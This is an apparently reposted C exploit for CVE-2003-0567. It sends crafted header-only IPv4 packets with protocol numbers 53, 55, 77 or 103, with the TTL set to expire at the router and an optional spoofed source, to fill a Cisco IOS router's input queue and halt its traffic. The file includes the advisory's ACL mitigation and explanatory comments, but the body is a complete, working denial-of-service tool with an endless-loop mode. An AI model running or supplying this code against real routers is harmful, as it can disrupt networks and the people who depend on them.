FlyFar

Cisco IOS - 'cisco-bug-44020.c' IPv4 Packet Denial of Service - CVE-2003-0567

Feb 5th, 2024
/*******************************************************
 * cisco-bug-44020.c - Copyright by Martin Kluge (martin@elxsi.de)
 *
 * Feel free to modify this code as you like, as long as you include
 * the above copyright statement.
 *
 * Please use this code only to check your OWN cisco routers.
 *
 *
 * This exploit uses the bug in recent IOS versions to stop the router
 * from processing traffic once the input queue is full.
 *
 *
 * Use access control lists as described in the CISCO advisory to
 * protect your cisco routers:
 *
 * access-list 101 deny 53 any any
 * access-list 101 deny 55 any any
 * access-list 101 deny 77 any any
 * access-list 101 deny 103 any any
 *
 * This code was only tested on linux, no warranty is or will be
 * provided.
 *
 * Usage: ./cisco-bug-44020 <src ip> <dst ip> <hops> <number>
 * Source IP: Your source IP (or a spoofed source IP)
 * Destination IP: The IP of the vulnerable cisco router
 * Hops: The number of hops between you and the router,
 * the time to live (ttl) should be 0 when the packet
 * is received by the cisco router.
 * Number: Number of packets to send (0 = loop)
 *******************************************************/
  33.  
  34. #include <stdio.h>
  35. #include <stdlib.h>
  36. #include <string.h>
  37. #include <unistd.h>
  38.  
  39. #include <arpa/inet.h>
  40. #include <netinet/in.h>
  41.  
  42. #include <sys/time.h>
  43. #include <sys/types.h>
  44. #include <sys/socket.h>
  45.  
/*
 * Build-time switch: while DEBUG is defined, main() prints the hop count,
 * the protocol number chosen for each packet, the header checksum, a hex
 * dump of the header bytes and the sendto() result.
 */
#define DEBUG

/* Fallback used only when the system headers do not define IPPROTO_RAW. */
#if !defined(IPPROTO_RAW)
#define IPPROTO_RAW 0
#endif
  51.  
/*
 * IPv4 header without options.
 *
 * main() copies the first 0x14 (20) bytes of this struct straight into the
 * outgoing packet, so the declaration order below is the on-wire order.
 * NOTE(review): this relies on the compiler packing the 8-bit bit-fields
 * into single bytes with no padding -- confirm for any non-GCC toolchain.
 */
struct ipv4_pkt_header {
    unsigned ipvhl : 8;             /* version + header length */
    unsigned type_service : 8;      /* TOS (Type of Service) */
    unsigned short int packet_len;  /* header + payload length */
    unsigned short int ident;       /* identification */
    unsigned short int fragment;    /* fragment offset field */
    unsigned time_live : 8;         /* TTL (Time to Live) */
    unsigned protocol : 8;          /* IP protocol number */
    unsigned short int sum;         /* header checksum */
    struct in_addr src_ip;          /* source address */
    struct in_addr dst_ip;          /* destination address */
};
  65.  
  66.  
/*
 * IP protocol numbers placed in the header's protocol field; main() picks
 * one at random for every packet.  They are the same four values that the
 * advisory ACL quoted in the file header denies (53, 55, 77, 103), so that
 * ACL is the filter that drops the traffic this program generates.
 */
char proto[] = { 53, 55, 77, 103 };


/* Prototypes */
int in_cksum(unsigned short *addr, int len, int csum);
  72.  
  73.  
/*
 * Entry point.  Arguments: <src ip> <dst ip> <hops> <number>.
 *
 * Fills in one bare IPv4 header (0x14 bytes, no payload) and writes it to
 * a raw socket <number> times; <number> == 0 means the loop never ends.
 * Per packet only the protocol field (one of proto[]), the identification
 * field and the checksum change.
 *
 * What a defender sees on the wire: header-only IPv4 packets addressed to
 * the router, TTL set from the <hops> argument, IP protocol 53, 55, 77 or
 * 103.  The ACL entries quoted in the file header deny exactly those four
 * protocol numbers.
 *
 * Returns EXIT_FAILURE on a wrong argument count, on socket() failure or
 * on gettimeofday() failure, otherwise EXIT_SUCCESS.  The results of
 * inet_addr(), atoi(), malloc() and sendto() are used without checks, and
 * the early error returns inside the loop do not close the socket.
 */
int main (int argc, char *argv[])
{
    struct ipv4_pkt_header hdr;
    struct sockaddr_in dest;
    struct timeval now;

    unsigned long saddr, daddr;
    unsigned char *pkt;

    int sock, ttl, total, written;
    int sent = 0;
    int forever = 0;
    int idx;

    /* Header only: the original payload length is always 0. */
    const int pkt_len = 0x14;

    /* Exactly four arguments are required */
    if (argc != 5) {
        fprintf(stderr, "Usage: %s <src ip> <dst ip> <hops> <number>\n\n", argv[0]);
        return EXIT_FAILURE;
    }

    saddr = inet_addr(argv[1]);
    daddr = inet_addr(argv[2]);
    ttl = atoi(argv[3]);
    total = atoi(argv[4]);

    /* A count of 0 selects the endless mode: the counter is never advanced. */
    if (total == 0) {
        forever = 1;
        total = 1;
    }

#ifdef DEBUG
    printf("DEBUG: Hops: %i\n", ttl);
#endif

    /* Raw socket: the program supplies the complete IP header itself */
    sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (sock == -1) {
        fprintf(stderr, "Error: Cannot open raw socket.\n");
        return EXIT_FAILURE;
    }

    /* Fields that stay the same for every packet */
    hdr.ipvhl = 0x45;               /* version 4, header length 5 words */
    hdr.type_service = 0x10;

#ifdef OSTYPE_BSD
    hdr.packet_len = pkt_len;
    hdr.fragment = 0x4000;
#else
    hdr.packet_len = htons(pkt_len);
    hdr.fragment = htons(0x4000);
#endif

    hdr.time_live = ttl;
    hdr.src_ip.s_addr = saddr;
    hdr.dst_ip.s_addr = daddr;

    while (sent < total) {
        /* The generator is re-seeded from the clock on every iteration */
        if (gettimeofday(&now, NULL) == -1) {
            fprintf(stderr, "Error: Cannot seed the random generator.\n");
            return EXIT_FAILURE;
        }

        srandom((unsigned int) (now.tv_sec ^ now.tv_usec));

        hdr.protocol = proto[random() % 0x4];

#ifdef DEBUG
        printf("DEBUG: Protocol: %i\n", hdr.protocol);
#endif

        hdr.ident = htons(random() % 0x7fff);

        /* The checksum field must be zero while the checksum is computed */
        hdr.sum = 0x0000;
        hdr.sum = in_cksum((unsigned short *) &hdr, pkt_len, 0);

#ifdef DEBUG
        printf("DEBUG: Checksum: %i\n", hdr.sum);
#endif

        pkt = malloc(pkt_len);
        memset(pkt, '\0', pkt_len);
        memcpy(pkt, &hdr, pkt_len);

#ifdef DEBUG
        printf("DEBUG: ");
        for (idx = 0; idx < pkt_len; idx++)
            printf(" %02x", pkt[idx]);
        printf("\n");
#endif

        memset(&dest, 0, sizeof dest);
        dest.sin_family = AF_INET;
        dest.sin_addr.s_addr = daddr;

        written = sendto(sock, pkt, pkt_len, 0,
                         (struct sockaddr *) &dest, sizeof(struct sockaddr));

#ifdef DEBUG
        printf("DEBUG: Wrote %i bytes.\n", written);
#endif

        if (!forever)
            sent++;

        free(pkt);
    }

    close(sock);
    return EXIT_SUCCESS;
}
  183.  
  184.  
/*
 * 16-bit one's-complement checksum over len bytes starting at addr.
 *
 * addr: data to sum, read as native-order 16-bit words
 * len:  number of bytes to cover
 * csum: initial value of the accumulator
 *
 * Returns the complemented, folded sum as a value in 0..0xffff.
 */
int in_cksum(unsigned short *addr, int len, int csum)
{
    const unsigned short *word = addr;
    unsigned short folded;
    int remaining;
    int acc = csum;

    /* Add up the data one 16-bit word at a time in a wider accumulator. */
    for (remaining = len; remaining > 1; remaining -= 2)
        acc += *word++;

    /* A trailing odd byte is added on its own. */
    if (remaining == 1)
        acc += htons(*(const unsigned char *)word << 8);

    /* Fold the carries that spilled above bit 15 back into the low half. */
    acc = (acc & 0xffff) + (acc >> 16);
    acc += acc >> 16;

    /* Complement; the assignment truncates to 16 bits. */
    folded = ~acc;
    return folded;
}
  211.  
  212.  
  213. // milw0rm.com [2003-07-21]